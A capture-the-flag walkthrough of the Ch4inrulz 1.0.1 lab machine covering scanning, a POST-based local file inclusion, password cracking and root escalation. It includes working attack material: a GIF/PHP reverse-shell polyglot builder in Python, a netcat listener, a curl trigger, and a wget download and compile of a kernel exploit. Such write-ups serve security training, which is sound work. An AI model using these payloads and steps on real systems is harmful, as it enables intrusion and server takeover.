Ch4inrulz: 1.0.1 Walkthrough
Lab Environment
Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Ch4inrulz: 1.0.1
Let's start and break into this machine.
Scanning Phase : First, find the attacking machine's IP address.
Syntax used : ifconfig
Results : 192.168.146.131
Now scan the local network that the attacking machine and the vulnerable machine are both connected to.
Syntax used : arp-scan --local
Victim machine : 192.168.146.135
Enumeration Phase : Now use nmap to identify the services listening on every port (-p- scans all 65535 ports, -A enables version detection and default scripts, -Pn skips host discovery).
Syntax used : nmap -A 192.168.146.135 -p- -Pn
Results : HTTP is active on ports 80 and 8011, FTP on port 21
and SSH on port 22.
Now browse the IP in a browser to see the webpage on port 80.
Next, fire up dirb to enumerate directories.
Syntax used : dirb http://192.168.146.135
Browsing the discovered links one by one, I found something at 192.168.146.135/development
Note: this page hints at the upload functionality.
So change the URL from 192.168.146.135/development to 192.168.146.135/development/uploader
Results : the upload form on the webpage.
When prompted for HTTP authentication, I just clicked cancel.
This means credentials have to be found too.
Now, for further enumeration, I moved to port 8011 and ran dirb there.
Syntax used : dirb http://192.168.146.135:8011
Browsing the IP on port 8011 (HTTP is active there as well) gives a webpage.
dirb returned one link: 192.168.146.135:8011/api/index.html
Results : it lists the API's PHP files.
Opening files_api.php shows a message that suggests a local file inclusion (LFI), so I tried passing the 'file' parameter as the first line of the message says.
LFI syntax : 192.168.146.135:8011/api/files_api.php?file=/etc/passwd
Results : 'WRONG INPUT !!', a hint that the parameter has to be sent in a different way (a different HTTP method).
So use curl to send the same parameter in a POST request instead:
Syntax used : curl -X POST -d "file=/etc/passwd" http://192.168.146.135:8011/api/files_api.php
Results : the contents of /etc/passwd, confirming the inclusion works over POST.
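To make the GET-versus-POST check above repeatable, here is an added Python probe (not the walkthrough author's code). It sends the same `file` parameter with both methods and reports which one leaks a marker string from /etc/passwd. Because it must run offline, it is demonstrated against an embedded mock of files_api.php that behaves the way the page describes (GET answers 'WRONG INPUT !!', POST includes the requested file); the marker string, the mock's fake passwd line and the helper names are assumptions.

```python
"""Probe a file-inclusion parameter over GET and POST.

Added example, not part of the original walkthrough. The mock server below
imitates the behaviour described on the page (GET answers "WRONG INPUT !!",
POST with file=<path> returns the file); URL and markers are assumptions.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample of what /etc/passwd on the target might start with.
FAKE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\n"


class MockFilesApi(BaseHTTPRequestHandler):
    """Mimics files_api.php: rejects GET, serves file=<path> over POST."""

    def do_GET(self):
        self._reply(b"WRONG INPUT !!")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        path = form.get("file", [""])[0]
        body = FAKE_PASSWD if path == "/etc/passwd" else b"WRONG INPUT !!"
        self._reply(body)

    def _reply(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_mock_server():
    """Bind the mock on a free loopback port and serve it in the background."""
    server = HTTPServer(("127.0.0.1", 0), MockFilesApi)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch(url, method, param, path, timeout=5):
    """Send the inclusion attempt with the given HTTP method; return the body."""
    data = urllib.parse.urlencode({param: path}).encode()
    if method == "GET":
        req = urllib.request.Request(f"{url}?{data.decode()}", method="GET")
    else:
        req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def probe_lfi(url, param="file", path="/etc/passwd", marker="root:x:0:0"):
    """Try GET then POST; report which methods leak the marker string."""
    results = {}
    for method in ("GET", "POST"):
        body = fetch(url, method, param, path)
        results[method] = marker in body
    return results


if __name__ == "__main__":
    srv = start_mock_server()
    api = f"http://127.0.0.1:{srv.server_port}/api/files_api.php"
    print(probe_lfi(api))  # on the mock: {'GET': False, 'POST': True}
    srv.shutdown()
```

Against the real box you would point `probe_lfi` at http://192.168.146.135:8011/api/files_api.php instead of the mock; a parameter that is only read from `$_POST` is a common reason a GET probe "fails" while the inclusion is still there.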
No credentials found yet, and there was the development server found earlier, so I ran dirb against it again, this time with a bigger wordlist.
Syntax used : dirb http://192.168.146.135 /usr/share/wordlists/dirb/big.txt
Results : found a link to an index.html.bak file.
Browsing the link, i.e. http://192.168.146.135/index.html.bak
Results : a downloadable file.
Use cat to view the content of the file.
Syntax used : cat index.html.bak
Results : the highlighted part is an .htpasswd entry (username and password hash), as the comment in the file says.
Copy the highlighted hash into a text file named hash.txt and crack it with john (it auto-detects the hash format).
Syntax used : john hash.txt
Results: frank:frank!!!
Use the above credentials on the uploader, which only accepts image files, to upload a GIF.
How I created the payload with a gif extension:
Command used : locate php-reverse
Results : found the PHP reverse shell (pentestmonkey's php-reverse-shell.php) shipped with Kali and modified it.
Opened it, copied the code into leafpad and changed the IP from localhost to the attacker's IP and the port to the one I will listen on.
Then added the GIF file header, GIF89a, at the very start of the code so that the uploader's image check treats the file as a GIF and lets it through.
Now upload the payload with username frank and password frank!!! ; the upload succeeds.
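The payload construction in the steps above, as an added Python example (not the walkthrough author's script): it rewrites the listener address in the reverse shell and prepends the GIF89a header so a header-only image check accepts the file. The reverse-shell body is a minimal constructed stand-in for pentestmonkey's php-reverse-shell.php, reproducing only the $ip/$port assignment lines that the walkthrough edits plus a short fsockopen/proc_open shell; the attacker IP/port and the output filename are assumptions.

```python
"""Build a GIF/PHP polyglot for an image-only uploader.

Added example, not the walkthrough author's code. The PHP body below is a
constructed minimal stand-in for php-reverse-shell.php; the $ip/$port
assignment lines are written in the same form as in that script.
"""
import re

# 6-byte header every GIF89a file starts with (GIF87a is the older variant).
GIF_MAGIC = b"GIF89a"

# Constructed stand-in for the real php-reverse-shell.php (assumption).
PHP_REVERSE_SHELL_STUB = b"""<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$sock = fsockopen($ip, $port);
$desc = array(0 => $sock, 1 => $sock, 2 => $sock);
$proc = proc_open('/bin/sh -i', $desc, $pipes);
?>
"""


def set_listener(php_source: bytes, ip: str, port: int) -> bytes:
    """Rewrite the $ip and $port assignments to point at the attacker."""
    src = re.sub(rb"\$ip\s*=\s*'[^']*';", b"$ip = '%s';" % ip.encode(),
                 php_source, count=1)
    src = re.sub(rb"\$port\s*=\s*\d+;", b"$port = %d;" % port, src, count=1)
    return src


def make_gif_polyglot(php_source: bytes) -> bytes:
    """Prepend the GIF magic so a header-only image filter accepts the file.

    When the file is later pulled in through include(), PHP echoes the
    header bytes as plain text and then executes the <?php ... ?> block.
    """
    return GIF_MAGIC + b"\n" + php_source


def passes_magic_check(data: bytes) -> bool:
    """What a header-only image filter sees: a GIF87a or GIF89a prefix."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def contains_php(data: bytes) -> bool:
    """True if the file still carries an executable PHP open tag."""
    return b"<?php" in data


if __name__ == "__main__":
    shell = set_listener(PHP_REVERSE_SHELL_STUB, "192.168.146.131", 1234)
    payload = make_gif_polyglot(shell)
    with open("paras.gif", "wb") as fh:   # filename is an assumption
        fh.write(payload)
    print(passes_magic_check(payload), contains_php(payload))  # True True
```

A filter that only looks at the first bytes (or the extension) is satisfied by the header alone; a filter that actually decodes or re-encodes the image would reject this file, which is worth checking before assuming the upload step will work on a different target.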
Now the main part: start a netcat listener first, then trigger the payload through the POST file inclusion.
Command used for netcat: nc -lnvp 1234 (the port set in the payload)
Command used : curl -X POST -d "file=/var/www/development/uploader/FRANKuploads/paras.gif" http://192.168.146.135:8011/api/files_api.php
Note: it took me a while to guess the correct directory the file is uploaded to.
Results : got a connection in netcat and spawned a proper shell.
Command to spawn the shell: python -c 'import pty; pty.spawn("/bin/bash")'
Next, get the kernel version of the victim machine.
Command used : uname -a
Results : kernel 2.6.36
Found a matching exploit on exploit-db (EDB-ID 15285) and downloaded it to the attacker's machine.
Transferred it to the victim by serving it with Python's built-in HTTP server on the attacker's machine.
Command used : python -m SimpleHTTPServer 80
Downloaded the exploit from the attacker's machine into the victim's /tmp directory.
Command used on the victim machine to download the exploit :
cd /tmp && wget http://192.168.146.131/Downloads/15285.c
Command to compile the exploit : gcc 15285.c -o 15285
Command used: chmod 777 15285
Explanation: makes the file readable, writable and executable by everyone; chmod +x 15285 would be enough here.
Running the exploit
Command used : ./15285
Results : a root shell
Exploring as root, finally found the root flag.